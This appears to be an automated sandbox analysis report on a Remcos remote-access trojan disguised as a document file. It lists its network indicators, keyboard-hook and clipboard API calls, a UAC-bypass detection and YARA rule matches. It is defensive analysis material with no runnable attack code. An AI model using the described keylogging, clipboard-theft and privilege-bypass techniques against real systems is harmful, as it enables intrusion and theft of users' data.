                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,15_2_0041B380
                Source: global trafficDNS traffic detected: DNS query: www.vipguyclassproject2024.space
                Source: vbc.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, TkdxROLUOVpK.exe, 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2091740507.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, TkdxROLUOVpK.exe, 0000000A.00000002.2127357772.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000015_2_0040A2B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,15_2_0040B70E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004168C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,15_2_0040B70E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,15_2_0040A3E0

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2107662526.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 4304, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\gaban\logs.dat, type: DROPPED

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0041C9E2 SystemParametersInfoW,15_2_0041C9E2

                System Summary

                barindex
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.7570000.8.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,15_2_004167B4
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_0270D4FC0_2_0270D4FC
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_047664200_2_04766420
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_047644D80_2_047644D8
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_04764D480_2_04764D48
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_0476C6B80_2_0476C6B8
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_04765FE80_2_04765FE8
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_047649100_2_04764910
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_047649000_2_04764900
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_06AEBD000_2_06AEBD00
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_06AEC7470_2_06AEC747
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_06AE935C0_2_06AE935C
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_06AE00400_2_06AE0040
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_075607C80_2_075607C8
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_0756DA880_2_0756DA88
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_075669F00_2_075669F0
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_075651E80_2_075651E8
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_075690390_2_07569039
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_075638D60_2_075638D6
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_07567E400_2_07567E40
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_07567E390_2_07567E39
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_07567D180_2_07567D18
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_07567D090_2_07567D09
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_0756CC780_2_0756CC78
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_07564A7C0_2_07564A7C
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_0756D2280_2_0756D228
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_075672F80_2_075672F8
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_075672EA0_2_075672EA
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_075691DB0_2_075691DB
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_075669EA0_2_075669EA
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_075669AA0_2_075669AA
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeCode function: 10_2_012AD4FC10_2_012AD4FC
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeCode function: 10_2_04AE44D810_2_04AE44D8
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeCode function: 10_2_04AE642010_2_04AE6420
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeCode function: 10_2_04AE4D4810_2_04AE4D48
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeCode function: 10_2_04AE5FE810_2_04AE5FE8
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeCode function: 10_2_04AE491010_2_04AE4910
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeCode function: 10_2_04AEBA0010_2_04AEBA00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0043E0CC15_2_0043E0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0041F0FA15_2_0041F0FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0045415915_2_00454159
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0043816815_2_00438168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_004461F015_2_004461F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0043E2FB15_2_0043E2FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0045332B15_2_0045332B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0042739D15_2_0042739D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_004374E615_2_004374E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0043E55815_2_0043E558
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0043877015_2_00438770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_004378FE15_2_004378FE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0043394615_2_00433946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0044D9C915_2_0044D9C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00427A4615_2_00427A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0041DB6215_2_0041DB62
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00427BAF15_2_00427BAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00437D3315_2_00437D33
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00435E5E15_2_00435E5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00426E0E15_2_00426E0E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0043DE9D15_2_0043DE9D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00413FCA15_2_00413FCA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00436FEA15_2_00436FEA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 00434E10 appears 54 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 00402093 appears 50 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 00434770 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 00401E65 appears 34 times
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2097614968.0000000007570000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs #U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2090587002.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs #U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2097704677.00000000075FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs #U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2097030538.0000000006E30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs #U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000000.2042879669.00000000004BA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameznIq.exe0 vs #U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeBinary or memory string: OriginalFilenameznIq.exe0 vs #U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
